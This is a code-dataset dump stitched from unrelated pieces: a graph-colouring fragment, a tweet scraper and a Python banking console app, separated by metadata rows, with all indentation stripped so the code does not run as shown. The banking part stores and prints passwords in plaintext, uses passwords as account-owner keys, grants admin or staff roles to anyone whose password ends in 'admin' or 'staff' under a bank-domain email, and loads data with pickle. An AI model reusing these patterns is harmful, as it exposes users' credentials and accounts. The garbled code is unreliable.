# for i in range(b_rows,len(matrix_a)):
# matrix_b.append([])
# for j in range(0,len(matrix_a)):
# matrix_b[i].append(0)
# if b_rows>len(matrix_a) and b_columns<len(matrix_a):
# for i in range(len(matrix_a),b_rows):
# matrix_b.pop()
# for i in range(0,len(matrix_a)):
# for j in range(b_columns,len(matrix_a)):
# matrix_b[i].append(0)
# if b_rows>len(matrix_a) and b_columns==len(matrix_a):
# for i in range(len(matrix_a),b_rows):
# matrix_b.pop()
# if b_rows<len(matrix_a) and b_columns==len(matrix_a):
# for i in range(b_rows,len(matrix_a)):
# matrix_b.append([])
# for j in range(0,len(matrix_a)):
# matrix_b[i].append(0)
# if b_columns<len(matrix_a) and b_rows==len(matrix_a):
# for i in range(0,len(matrix_a)):
# for j in range(b_columns,len(matrix_a)):
# matrix_b[i].append(0)
# if b_columns>len(matrix_a) and b_rows==len(matrix_a):
# for i in range(0,len(matrix_a)):
# for j in range(len(matrix_a),b_columns):
# matrix_b[i].pop()
# return info_func.strassen(matrix_a,matrix_b)
def first_input(self,n):
colors=[]
for i in range(0,n):
colors.append(0)
return colors
def first_input(self,n):
colors=[]
for i in range(0,n):
colors.append(0)
return colors
def promising(self,counts=0,colors=[],edges=[]):
switch = True
j = 0
while j < counts and switch:
if edges[counts][j]==1 and colors[counts] == colors[j]:
switch=False
j+=1
return switch
def grath_coloring(self,i=-1,colors=[],edges=[],num_of_color=1):
if self.promising (i,colors,edges):
if i == num_of_color-1:
self.result_grath_coloring.append([x for x in colors])
else:
for color in range(1,num_of_color+1):
colors[i + 1] = color
self.grath_coloring(i + 1,colors,edges,num_of_color)
def min_color(self,num_of_color=1):
# find min of max every result
min = num_of_color
for each in self.result_grath_coloring:
max_each=max(each)
if max_each < min:
min = max_each
self.min_list_coloring=each
return min
| true |
444499766a3f4a77f919a1bf36eab79e0e649561 | Python | abhesrivas/code-mixed-embeddings | /CMEmbeddings/scraper/demo.py | UTF-8 | 1,788 | 3 | 3 | [] | no_license | from scraper import AdvancedSearchScraper
import sys
import string
import re
def is_ascii(s):
return all(ord(c) < 128 for c in s)
def scrape_tweets(word, count, start, end):
if(start==0 and end==0):
name = "scraped/"+word+".txt"
ass = AdvancedSearchScraper(word, count)
tweets = ass.scrape()
with open(name, 'w') as f:
for tweet in tweets:
text = tweet['tweet_text']
t_id = tweet['tweet_id']
language = tweet['tweet_language']
text = re.sub(r"http\S+", "", text)
text = text.translate(str.maketrans('','',string.punctuation))
text = text.lower()
text = text.translate(str.maketrans('','','1234567890'))
if((is_ascii(text)) and (language=='en')):
f.write(str(t_id)+","+text+"\n")
else:
words = open("data/frequent_set_words.txt").read().split('\n')
words = list(sorted(set(words)))
name = "scraped/"+words[start]+"_to_"+words[end-1]+".txt"
print(name)
for i in range(start, end):
word = words[i]
ass = AdvancedSearchScraper(word, count)
tweets = ass.scrape()
print("Done for "+str(i)+" "+words[i])
with open(name, 'a+') as f:
for tweet in tweets:
text = tweet['tweet_text']
t_id = tweet['tweet_id']
language = tweet['tweet_language']
text = re.sub(r"http\S+", "", text)
text = text.translate(str.maketrans('','',string.punctuation))
text = text.lower()
text = text.translate(str.maketrans('','','1234567890'))
if(is_ascii(text)):
f.write(str(t_id)+","+text+"\n")
word = sys.argv[1]
count = int(sys.argv[2])
start = int(sys.argv[3])
end = int(sys.argv[4])
try:
scrape_tweets(word, count, start, end)
except Exception as e:
print("exception:")
print(e)
print("Done!")
| true |
6c9d65ffb0273803ba8cb449977c44a76346ff72 | Python | rdeyanski/BestBank | /Bank/Functions.py | UTF-8 | 52,206 | 2.921875 | 3 | [] | no_license | import pickle
import matplotlib.pyplot as plt
import numpy as np
from datetime import datetime
from Bank.Acc_Classes import DepositAccount, CreditAccount, MortgageAccount
from Bank.Transactions import Deposit, Withdraw
from Bank.Updates import UserUpdate, AccountUpdate, TransferUpdate
from Bank.User_Classes import Company, Person, Admin, Employee, Staff
# Load the persisted application state from the pickle files next to this
# module; these four lists act as a simple on-disk database for users,
# accounts, transactions and update history.
with open('users_inventory', 'rb') as users_inventory_file:
    users_inventory = pickle.load(users_inventory_file)
with open('accounts_inventory', 'rb') as accounts_inventory_file:
    accounts_inventory = pickle.load(accounts_inventory_file)
with open('transactions_inventory', 'rb') as transactions_inventory_file:
    transactions_inventory = pickle.load(transactions_inventory_file)
with open('updates_inventory', 'rb') as updates_inventory_file:
    updates_inventory = pickle.load(updates_inventory_file)
def current_time():
    """Print the current local date and time ("dd/mm/YYYY HH:MM:SS")
    followed by a blank line."""
    stamp = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
    print(stamp, '\n')
def welcome():
    """ Greets the user and gives options to enter the system """
    # One print call assembles the framed ASCII menu; the string
    # multiplications draw the borders and the commas insert the single
    # spaces between pieces.
    # NOTE(review): there is no comma after '|' at the end of the
    # "Interest Calculator" line, so it implicitly concatenates with
    # '\n| 4. Quit.' -- confirm the menu renders as intended.
    print('\n', '=' * 41, '\n|',
          ' Welcome in BestBank Online System! '
          '|\n|', '*' * 40, '|\n|', ' ' * 40, '|',
          '\n| 1. Login.', ' ' * 30, '|',
          '\n| 2. Register (new user).', ' ' * 16, '|',
          '\n| 3. Interest Calculator.', ' ' * 16, '|'
          '\n| 4. Quit.', ' ' * 31, '|',
          '\n|', ' ' * 40, '|',
          '\n| Please, enter one of the options above: |',
          '\n|', '-' * 40, '|')
def register():
    """Register a new user in the system.

    Reads personal details and a (repeated) password from stdin. Emails
    ending in '@bestbank.eu' register staff: the last five password
    characters select Admin ('admin') or Employee ('staff'). All other
    emails register a Business (Company) or Personal (Person) customer.
    The new user and a UserUpdate record are appended to the in-memory
    inventories and pickled back to disk.

    NOTE(review): in the staff branch, an invalid mark2 prints "Invalid
    Registration!" but then falls through and still records a UserUpdate
    and prints the congratulations message -- confirm whether it should
    return early instead.
    """
    # users_inventory = []
    # updates_inventory = []
    now = datetime.now()
    dt_string = now.strftime("%d/%m/%Y at %H:%M:%S")
    first_name = input('\nEnter first name:\t')
    last_name = input('Enter last name:\t')
    phone = input('Enter your phone number:\t')
    email = input('Enter your email address:\t')
    new_password = input('Enter your password:\t')
    re_password = input('Repeat your password:\t')
    # Keep prompting until the password and its repeat agree.
    while new_password != re_password:
        print('Repeat incorrect! Please enter and re-enter your password:\t')
        command1 = input()
        command2 = input()
        if command1 == command2:
            new_password = re_password = command2
    password = new_password
    mark1 = email
    mark2 = password[-5::]  # last five password characters select the staff role
    if mark1.split('@')[1] == 'bestbank.eu':
        # Staff registration (bank-domain email).
        title = input('\nEnter your title:\t')
        admin_id = input('\nEnter your ID:\t')
        if mark2 == 'admin':
            users_inventory.append(Admin(first_name, last_name, phone, email, password, title, admin_id))
        elif mark2 == 'staff':
            empl_id = admin_id
            users_inventory.append(Employee(first_name, last_name, phone, email, password, title, empl_id))
        else:
            print('\n', '=' * 38,
                  '\nInvalid Registration!'
                  '\nPlease, try again, or contact us in person.'
                  f'\nThank you!\n{dt_string}', '-' * 38)
            pass
        # Record the registration event and persist both inventories.
        user_name = first_name + last_name
        old_detail = 'Staff'
        new_detail = password
        date_time = dt_string
        updates_inventory.append(UserUpdate(user_name, old_detail, new_detail, date_time))
        print(f'\nCongratulations, {first_name} {last_name}!,\n'
              f'You successfully joined Best Bank Team as {title}.')
        with open('users_inventory', 'wb') as users_inventory_file:
            pickle.dump(users_inventory, users_inventory_file)
        with open('updates_inventory', 'wb') as updates_inventory_file:
            pickle.dump(updates_inventory, updates_inventory_file)
    else:
        # Customer registration: Business (Company) or Personal (Person).
        command = input('\nWhat type of online banking you register?'
                        '\n1. Business.'
                        '\n2. Personal.'
                        '\nPlease, enter one of the options above:\t')
        type = None  # NOTE(review): shadows the builtin `type` inside this function
        if command == '1':
            customer_id = input('Enter your company ID:\t')
            company_name = input('Enter company name:\t')
            users_inventory.append(Company(first_name, last_name, phone, email, password, customer_id, company_name))
            type = 'Business'
        if command == '2':
            customer_id = input('Enter your personal ID:\t')
            address = input('Enter postal address:\t')
            users_inventory.append(Person(first_name, last_name, phone, email, password, customer_id, address))
            type = 'Personal'
        # Record the registration event and persist both inventories.
        user_name = first_name + last_name
        old_detail = type
        new_detail = password
        date_time = dt_string
        updates_inventory.append(UserUpdate(user_name, old_detail, new_detail, date_time))
        print(f'\n Congrats {first_name} {last_name}!'
              f'\n You are registered as {type} Customer'
              f'\n on {dt_string}'
              f'\n IMPORTANT:'
              f'\n Please, wait SMS confirming your bank account,'
              f'\n then login and change your password first. Thank you!')
        with open('users_inventory', 'wb') as users_inventory_file:
            pickle.dump(users_inventory, users_inventory_file)
        with open('updates_inventory', 'wb') as updates_inventory_file:
            pickle.dump(updates_inventory, updates_inventory_file)
def all_users_list():
""" Displays all users in the system """
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y at %H:%M:%S")
def print_user_list():
mark = None
if type(user) is Person:
mark = 'Personal:'
if type(user) is Company:
mark = 'Business:'
if type(user) is Admin or type(user) is Employee:
mark = user.title + ':'
print('{:.<28}'.format(mark + ' ' + user.first_name + ' ' + user.last_name),
'{:.<17}'.format(user.phone), '{:.<21}'.format(user.email), '{:>10}'.format(user.password))
command = input('\n 1. New Applicants.'
'\n 2. Current Users.'
'\n 3. Staff.'
'\n 4. <= Back'
'\n Enter one of the options above:\t')
if command == '1':
print('\n\n|', '=' * 25, ' NEW APPLICANTS REPORT ', '=' * 25, '|',
'\n| type/first/last name ----- phone number ----'
' email address ------- password |\n|', ' ' * 75, '|')
for user in users_inventory:
flag = True
for account in accounts_inventory:
if user.password == account.owner:
flag = True
break
else:
flag = False
if not flag:
print_user_list()
if command == '2':
print('\n\n|', '=' * 27, ' USERS LIST REPORT ', '=' * 27,
'|\n| type/first/last name ----- phone number ----'
' email address ------- password |\n|', ' ' * 75, '|')
for user in users_inventory:
for account in accounts_inventory:
if user.password != account.owner:
continue
else:
print_user_list()
break
if command == '3':
print('\n\n|', '=' * 26, ' STAFF LIST REPORT ', '=' * 28,
'|\n| title/first/last name ----- phone number ----'
' email address ------ password |\n|', ' ' * 75, '|')
for user in users_inventory:
if type(user) is Admin or type(user) is Employee:
print_user_list()
print('|', ' ' * 75, '|\n|', '-' * 36,
f'Report done on: {dt_string} |')
def user_update():
""" Updates User's Profile """
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
def print_users_details():
print('1. First name: ', '{:.>22}'.format(user.first_name),
'\n2. Last name: ', '{:.>23}'.format(user.last_name),
'\n3. Phone number: ', '{:.>20}'.format(user.phone),
'\n4. Email address: ', '{:.>19}'.format(user.email),
'\n5. Password: ', '{:.>24}'.format(user.password))
if type(user) is Person:
print('6. Mail address: ', '{:.>20}'.format(user.address))
if type(user) is Company:
print('6. Company name: ', '{:.>20}'.format(user.company_name))
if type(user) is Admin or type(user) is Employee:
print('6. Job title: ', '{:.>18}'.format(user.title))
password = input('\n Enter password:\t')
flag = None
for user in users_inventory:
if user.password != password:
pass
if user.password == password:
flag = True
user_name = user.first_name + ' ' + user.last_name
old_detail = None
new_detail = None
print()
print('=' * 38)
print('---------- Current Profile ----------')
print_users_details()
command = input(f'\nPlease, enter from 1 to 6, which detail'
f'\nyou would like to update:\t')
if command == '1':
old_detail = user.first_name
new_detail = input('\nEnter first name:\t')
user.first_name = new_detail
if command == '2':
old_detail = user.last_name
new_detail = input('\nEnter last name:\t')
user.last_name = new_detail
if command == '3':
old_detail = user.phone
new_detail = input('\nEnter new phone number:\t')
user.phone = new_detail
if command == '4':
old_detail = user.email
new_detail = input('\nEnter new email address:\t')
user.email = new_detail
if command == '5':
old_detail = user.password
old_password = password
new_password = input('\nEnter new password:\t')
re_password = input('\nRepeat new password:\t')
while new_password != re_password:
print('\nRepeat incorrect! Please enter and re-enter new password:\t')
command1 = input()
command2 = input()
if command1 == command2:
new_password = re_password = command2
new_detail = new_password
user.password = new_detail
for account in accounts_inventory:
if account.owner == old_password:
account.owner = user.password
if command == '6':
if type(user) is Person:
old_detail = user.address
new_detail = input('\nEnter new mail address:\t')
user.address = new_detail
if type(user) is Company:
old_detail = user.company_name
new_detail = input('\nEnter new company name:\t')
user.company_name = new_detail
if type(user) is Admin or type(user) is Employee:
old_detail = user.company_name
new_detail = input('\nEnter new title:\t')
user.company_name = new_detail
updates_inventory.append(UserUpdate(user_name, old_detail, new_detail, dt_string))
print('\nYour detail was successfully updated!\n\n',
'=' * 37, '\n------------ New Profile ------------')
print_users_details()
print('-' * 38, f'\n Time of Record:{dt_string}\n', '=' * 38)
with open('users_inventory', 'wb') as users_inventory_file:
pickle.dump(users_inventory, users_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
if not flag:
print('\n Invalid Password!')
def new_account():
""" Opens new bank account """
# accounts_inventory = []
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_new_account():
print('\n NEW ACCOUNT REGISTERED:'
'\n -----------------------',
f'\n Account Owner: {user.first_name} {user.last_name}'
f'\n Account N: {account.account_id}'
f'\n Account Balance: ', '{:{width}.{prec}f}'.format(account.balance, width=10, prec=2), 'lv.'
f'\n Account Interest: {account.interest} %.')
if account_id[0] == '2':
print(f' Pay per month: ', '{:{width}.{prec}f}'.format(account.pay_per_month, width=12, prec=2), 'lv.')
print(f' Recorded on:{dt_string}', '\n', '-' * 36)
owner = input("\n\n Enter the account owner's password:\t")
account_id = input(' Enter 6 digit bank account number:\t')
balance = float(input(' Enter account balance:\t'))
interest = float(input(' Enter the account interest:\t'))
if account_id[0] == '1' and len(account_id) == 6:
accounts_inventory.append(DepositAccount(account_id, balance, interest, owner))
for account in accounts_inventory:
if account.account_id == account_id:
for user in users_inventory:
if account.owner == user.password:
print_new_account()
if account_id[0] == '2' and len(account_id) == 6:
pay_per_month = float(input(' Enter the amount pay per month:\t'))
if account_id[1] == '1':
accounts_inventory.append(CreditAccount(account_id, balance, interest, owner, pay_per_month))
if account_id[1] == '2':
accounts_inventory.append(MortgageAccount(account_id, balance, interest, owner, pay_per_month))
for account in accounts_inventory:
if account.account_id == account_id:
for user in users_inventory:
if account.owner == user.password:
print_new_account()
acc_id = account_id
old_detail = 'new_acc'
new_detail = owner
updates_inventory.append(AccountUpdate(acc_id, old_detail, new_detail, dt_string))
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
def new_user_account():
""" Opens first bank account for new user """
def print_user_list():
mark = None
if type(user) is Person:
mark = 'Personal:'
if type(user) is Company:
mark = 'Business:'
if type(user) is Admin or type(user) is Employee:
mark = user.title + ':'
print('{:.<28}'.format(mark + ' ' + user.first_name + ' ' + user.last_name),
'{:.<17}'.format(user.phone), '{:.<21}'.format(user.email), '{:>10}'.format(user.password))
print('\n\n|', '=' * 25, ' NEW APPLICANTS REPORT ', '=' * 25, '|',
'\n| type/first/last name ----- phone number ----'
' email address ------- password |\n|', ' ' * 75, '|')
for user in users_inventory:
flag = True
for account in accounts_inventory:
if user.password == account.owner:
flag = True
break
else:
flag = False
if not flag:
print_user_list()
new_account()
def account_update():
""" Updates account's detail """
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
def print_acc_details():
print('\n', '=' * 45, '\n', 'Account N: ', '{:<34}'.format(account.account_id), '\n', '-' * 45,
'\n 1. Account balance: ', '{:{width}.{prec}f}'.format(account.balance, width=18, prec=2), 'lv.'
'\n 2. Interest per month: ',
'{:{width}.{prec}f}'.format(account.interest, width=18, prec=2), '%.')
if type(account) is not DepositAccount:
print(' 3. Pay per month: ', '{:{width}.{prec}f}'.format(account.pay_per_month, width=23, prec=2), 'lv.')
print(' 4. Account password: ', '{:>23}'.format(account.owner), '\n 5. Quit.\n', '-' * 45)
command = input('\nEnter Account Number:\t')
for account in accounts_inventory:
if account.account_id == command:
acc_id = account.account_id
old_detail = None
new_detail = None
print_acc_details()
command = input('Enter one of the options above:\t')
if command == '5':
break
if command == '1':
old_detail = account.balance
new_detail = float(input('Enter new balance:\t'))
account.balance = new_detail
if command == '2':
old_detail = account.interest
new_detail = float(input('Enter new interest:\t'))
account.interest = new_detail
if command == '3':
old_detail = account.pay_per_month
new_detail = float(input('Enter new pay per month:\t'))
account.pay_per_month = new_detail
if command == '4':
old_detail = account.owner
new_detail = input("Enter new owner's password:\t")
account.owner = new_detail
updates_inventory.append(AccountUpdate(acc_id, old_detail, new_detail, dt_string))
print(f'\n Update successfully completed!')
print_acc_details()
print(f' Update recorded on: {dt_string}\n', '=' * 45, '\n\n')
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
def admin_main_screen():
print('\n', '=' * 40, '\n', '*' * 8, 'ADMIN OPERATIONS MODE', '*' * 8,
'\n\n 10. Accounts.'
'\n 11. Users.'
'\n 12. Transfers.'
'\n 13. Updates Report'
'\n 14. Quit.'
'\n Please, enter one of the options above:\t', '\n', '-' * 40)
def staff_main_screen():
print('\n', '=' * 40, '\n', '*' * 6, 'EMPLOYEE OPERATIONS MODE', '*' * 6,
'\n\n 6. Open New User Account.'
'\n 7. View Accounts.'
'\n 8. View Transfers.'
'\n 9. Quit.'
'\n Please, enter one of the options above:\t', '\n', '-' * 40)
def user_main_screen():
print('\n1. Money Transfer.'
'\n2. Reports.'
'\n3. Open New Account.'
'\n4. Manage Profile.'
'\n5. Quit.'
'\nPlease, enter one of the options above:\t', '\n', '-' * 40)
def user_login():
""" Access to user's accounts and main operations. """
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
command1 = input('\nPlease, enter your email:\t')
command2 = input('\nPlease, enter your password:\t')
flag = False
for user in users_inventory:
if command1 != user.email and command2 != user.password:
pass
if command1 == user.email and command2 == user.password:
flag = True
if command1.split('@')[1] == 'bestbank.eu':
command = input('Would you like proceed as customer (Y):\t').upper()
if command != 'Y':
if command2[-5::] == 'admin':
admin_main_screen()
elif command2[-5::] == 'staff':
staff_main_screen()
continue
print('\n', '=' * 6, dt_string, '=' * 6,
f'\n Hello {user.first_name} {user.last_name},'
f'\n Welcome in Best Bank online system!'
f'\n\n Your Accounts:')
print(' Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.owner == user.password:
if type(account) is DepositAccount:
mark = 'Deposit:'
else:
mark = 'Credit:'
print(f' {account.account_id} {mark} {account.balance:.2f} lv.')
user_main_screen()
if not flag:
print('\nInvalid username and/or password!\n', '-' * 32)
def all_accounts():
""" Displays accounts reports and charts in different views """
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_head():
print('\n', '=' * 47, '\nACCOUNTS REPORT: {:>30}'.format(dt_string),
'\nacc.N: ----- balance <=>type ------ name ------')
def print_accounts_report():
print('{:.6}'.format(account.account_id), '{:.>15}'.format(account.balance),
'{:.<5}'.format(mark), '{:.>19}'.format(user.first_name + ' ' + user.last_name))
command = input('\n 1. Total.'
'\n 2. By Types + Charts.'
'\n 3. By Users.'
'\n 4. Single account'
'\n 5. <= Back'
'\n\nEnter one of the options above:\t')
if command == '1':
print_head()
total_debit = 0
total_credit = 0
for account in accounts_inventory:
for user in users_inventory:
if user.password == account.owner:
if type(account) is DepositAccount:
total_debit += account.balance
mark = '<=Dt'
else:
total_credit += account.balance
mark = '=>Ct'
print_accounts_report()
print('-' * 43, '\nTotal Debit:', '{:.>26}'.format(total_debit), ' lv.'
'\nTotal Credit:','{:.>25}'.format(total_credit), ' lv.\n', '=' * 47, '\n')
if command == '2':
print_head()
print('Deposit Accounts:')
total_personal_deposits = 0
total_business_deposits = 0
total_staff_deposits = 0
total_deposit = 0
for account in accounts_inventory:
if type(account) is DepositAccount:
total_deposit += account.balance
mark = '<=Dt'
for user in users_inventory:
if user.password == account.owner:
if type(user) is Person:
total_personal_deposits += account.balance
if type(user) is Company:
total_business_deposits += account.balance
if isinstance(user, Staff):
total_staff_deposits += account.balance
print_accounts_report()
print(f'Total: ....... {total_deposit} Debit\n', '-' * 47)
print('Credit Accounts:')
total_personal_credits = 0
total_business_credits = 0
total_staff_credits = 0
total_credit = 0
for account in accounts_inventory:
if type(account) is CreditAccount:
total_credit += account.balance
mark = '=>Ct'
for user in users_inventory:
if user.password == account.owner:
if type(user) is Person:
total_personal_credits += account.balance
if type(user) is Company:
total_business_credits += account.balance
if isinstance(user, Staff):
total_staff_credits += account.balance
print_accounts_report()
print(f'Total: ....... {total_credit} Credit\n', '-' * 47)
print('Mortgage Accounts:')
total_personal_mrtgs = 0
total_business_mrtgs = 0
total_staff_mrtgs = 0
total_mrtg = 0
for account in accounts_inventory:
if type(account) is MortgageAccount:
total_mrtg += account.balance
mark = '=>Ct'
for user in users_inventory:
if user.password == account.owner:
if type(user) is Person:
total_personal_mrtgs += account.balance
if type(user) is Company:
total_business_mrtgs += account.balance
if isinstance(user, Staff):
total_staff_mrtgs += account.balance
print_accounts_report()
print(f'Total: ...... {total_mrtg} Credit\n', '=' * 47, '\n\n')
chart_command = input('\n Structure By Types Users '
'\n 1. - Deposit '
'\n 2. - Credit.'
'\n 3. - Mortgage.'
'\n 4. Totals By Types Accounts.'
'\n 5. <= Back'
'\n\n For Account Structure Chart'
'\n please enter one of options above:\t')
while chart_command in ['1', '2', '3', '4']:
if command == '':
break
if chart_command == '1':
a = total_personal_deposits
b = total_business_deposits
c = total_staff_deposits
slices = [a, b, c]
types = (f'personal\n{a:.0f}', f'business\n{b:.0f}', f'staff\n{c:.0f}')
cols = ['c', 'r', 'g']
plt.pie(slices, labels=types, colors=cols,
autopct='%1.1f%%')
plt.title(f'Deposit Accounts Structure\non{dt_string}')
plt.show()
if chart_command == '2':
a = total_personal_credits
b = total_business_credits
c = total_staff_credits
slices = [a, b, c]
types = (f'personal\n{a:.0f}', f'business\n{b:.0f}', f'staff\n{c:.0f}')
cols = ['c', 'r', 'g']
plt.pie(slices, labels=types, colors=cols,
autopct='%1.1f%%')
plt.title(f'Credit Accounts Structure\non{dt_string}')
plt.show()
if chart_command == '3':
a = total_personal_mrtgs
b = total_business_mrtgs
c = total_staff_mrtgs
slices = [a, b, c]
types = (f'personal\n{a:.0f}', f'business\n{b:.0f}', f'staff\n{c:.0f}')
cols = ['c', 'r', 'g']
plt.pie(slices, labels=types, colors=cols,
autopct='%1.1f%%')
plt.title(f'Mortgage Accounts Structure\non{dt_string}')
plt.show()
if chart_command == '4':
x = ['Deposits', 'Credits', 'Mortgages']
y = [total_deposit, total_credit, total_mrtg]
plt.bar(x, y, color='b')
plt.title('Report By Type Accounts')
plt.show()
chart_command = input()
if command == '3':
applicants_list = []
for user in users_inventory:
for account in accounts_inventory:
if user.password != account.owner:
continue
else:
applicants_list.append(user)
break
for user in users_inventory:
if user not in applicants_list:
continue
print(f'\n{user.first_name} {user.last_name}:')
total = 0
for account in accounts_inventory:
if account.owner == user.password:
print('{:.<6}'.format(account.account_id), '{:.>15}'.format(account.balance))
if account.account_id[0] == '1':
total += account.balance
else:
total -= account.balance
print('Total:', '{:.>15}'.format(total))
if command == '4':
account_id = input('\n Enter account number:\t')
mark = None
for account in accounts_inventory:
if account.account_id == account_id:
if type(account) is DepositAccount:
mark = 'Deposit'
if type(account) is CreditAccount:
mark = 'Credit'
if type(account) is MortgageAccount:
mark = 'Mortgage'
print(f'\n Account N: {account_id}'
f'\n Type: {mark}'
f'\n Balance: {account.balance:.2f} lv'
f'\n Interest: {account.interest:.2f} %')
if type(account) is not DepositAccount:
print(f' Pay per month: {account.pay_per_month:.2f} lv.')
def transfer():
""" Deposit to all accounts and withdraw from deposit accounts """
# transactions_inventory = []
def print_acc_balance():
if type(account) is DepositAccount:
mark = 'Deposit:'
else:
mark = 'Credit:'
print(f' {account.account_id} {mark} {account.balance:.2f} lv.')
password = input('\n Enter password:\t')
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y %H:%M:%S ")
type_transfer = input('\n 1. Internal.'
'\n 2. Deposit.'
'\n 3. Withdraw.'
'\n Enter type of transfer:\t')
account_id = input('\n Enter the account number:\t')
amount = float(input("\n Enter the amount you would like to transfer:\t "))
date_time = dt_string
if type_transfer == '1':
account2 = input('\n Enter the second account:\t')
new_balance1 = 0
new_balance2 = 0
account1 = 0
for account in accounts_inventory:
if account.account_id == account_id and type(account) is DepositAccount:
account.balance -= amount
new_balance1 = account.balance
transactions_inventory.append(Withdraw(account_id, amount, date_time))
if account.account_id == account2:
password = account.owner
account1 = account_id
account_id = account2
if type(account) is DepositAccount:
account.balance += amount
else:
account.balance -= amount
new_balance2 = account.balance
transactions_inventory.append(Deposit(account_id, amount, date_time))
print('\n', '=' * 35, f'\n Internal transfer {amount:.2f} lv'
f'\n from acc.N:{account1} to acc.N:{account2}'
f'\n Recorded on:{dt_string}\n', '-' * 35,
'\n New Balance:')
print(' Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.account_id == account1:
print_acc_balance()
if account.account_id == account2:
print_acc_balance()
else:
mark = None
for account in accounts_inventory:
if account.account_id == account_id:
password = account.owner
if type_transfer == '2':
mark = 'Deposit'
if type(account) is DepositAccount:
account.balance += amount
else:
account.balance -= amount
transactions_inventory.append(Deposit(account_id, amount, date_time))
if type_transfer == '3':
mark = 'Withdraw'
if type(account) is DepositAccount:
account.balance -= amount
transactions_inventory.append(Withdraw(account_id, amount, date_time))
print('\n', '=' * 40, f'\n {mark} transfer {amount} lv.'
f'\n acc.N:{account_id} New Balance: {account.balance:.2f} lv.'
f'\n Recorded on:{dt_string}\n', '-' * 40)
print(' Acc.N:___type___Balance:')
for account in accounts_inventory:
if account.owner == password:
print_acc_balance()
with open('transactions_inventory', 'wb') as transactions_inventory_file:
pickle.dump(transactions_inventory, transactions_inventory_file)
with open('accounts_inventory', 'wb') as accounts_inventory_file:
pickle.dump(accounts_inventory, accounts_inventory_file)
def all_transactions():
""" Displays transaction records in all accounts"""
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_report():
print(' {:<6}'.format(transaction.account_id), ':', '{:.>12}'.format(transaction.amount),
f'lv. {mark}', '{:.>25}'.format(transaction.date_time))
command = input('\n 1. Total.'
'\n 2. Daily + Chart.'
'\n 3. <= Back.'
'\n Enter one of the options above:\t')
if command == '1':
total_deposit = 0
total_credit = 0
print('\n\n', '=' * 18, 'ALL TRANSFERS REPORT', '=' * 17, '\nacc.N:',
'...... amount <==> type ......... date ... time', '\n', '-' * 57)
for transaction in transactions_inventory:
for account in accounts_inventory:
if transaction.account_id == account.account_id:
if type(transaction) is Deposit:
mark = '<= Dt.'
total_deposit += transaction.amount
print_report()
else:
mark = '=> Ct.'
total_credit += transaction.amount
print_report()
print('-' * 58, f'\n Total Dt: {total_deposit:.2f} lv. '
f' Total Ct: {total_credit:.2f} lv.',
'\n', '-' * 57, '\n Report done on:', dt_string, '\n')
if command == '2':
print('\n','='*8,'TOTAL DAILY TRANSFERS','='*8,
'\n --- date ----- deposits ----- withdraws')
tday = None
total_deposit = 0
total_credit = 0
deposit_tday = 0
credit_tday = 0
X = []
Y = []
Z = []
for transaction in transactions_inventory:
if type(transaction) is Deposit:
total_deposit += transaction.amount
else:
total_credit += transaction.amount
if tday is None:
tday = transaction.date_time[0:11]
# X.append(tday)
if type(transaction) is Deposit:
deposit_tday = transaction.amount
else:
credit_tday = transaction.amount
elif tday == transaction.date_time[0:11]:
if type(transaction) is Deposit:
deposit_tday += transaction.amount
else:
credit_tday += transaction.amount
continue
else:
print(' {:<12}'.format(tday),
'{:{width}.{prec}f}'.format(deposit_tday, width=10, prec=2),
'{:{width}.{prec}f}'.format(credit_tday, width=15, prec=2))
X.append(tday[0:6])
Y.append(deposit_tday)
Z.append(credit_tday)
tday = transaction.date_time[0:11]
if type(transaction) is Deposit:
deposit_tday = transaction.amount
credit_tday = 0
else:
credit_tday = transaction.amount
deposit_tday = 0
X.append(tday[0:6])
Y.append(deposit_tday)
Z.append(credit_tday)
print(' {:<12}'.format(tday),
'{:{width}.{prec}f}'.format(deposit_tday, width=10, prec=2),
'{:{width}.{prec}f}'.format(credit_tday, width=15, prec=2))
print('-'*40, f'\n Total: {total_deposit:.2f} lv. '
f'{total_credit:.2f} lv.\n', '-'*40)
_X = np.arange(len(X))
plt.title(f'D A I L Y T R A N S F E R S\nreported on:{dt_string}')
plt.bar(_X - 0.2, Y, 0.4)
plt.bar(_X + 0.2, Z, 0.4)
plt.xlabel('Days')
plt.ylabel('amounts')
plt.legend(['Deposit','Withdraw'], loc="upper left")
plt.xticks(_X, X)
chart = input('\nEnter to show in chart')
if chart == '':
plt.show()
def transfer_update():
now = datetime.now()
dt_string = now.strftime(" %d/%m/%Y at %H:%M:%S ")
def print_transfer_details():
print('\n Money Transfer:', transfer_time,
'\n 1. Account N: ', transaction.account_id,
f'\n 2. Amount: {transaction.amount:.2f} lv.')
transfer_time = input('\n Enter date_time:\t')
for transaction in transactions_inventory:
if transfer_time == transaction.date_time[1:-1]:
acc_id = transaction.account_id
old_detail = None
new_detail = None
print_transfer_details()
command = input(' 3. Quit.\n Enter one of the options above:\t')
if command == '3':
break
if command == '1':
old_detail = transaction.account_id
new_detail = input('\n Enter new account:\t')
transaction.account_id = new_detail
if command == '2':
old_detail = transaction.amount
new_detail = float(input('\n Enter new amount:\t'))
transaction.amount = new_detail
updates_inventory.append(TransferUpdate(acc_id, old_detail, new_detail, dt_string))
print('\n','='*45,'\n Update successfully completed!')
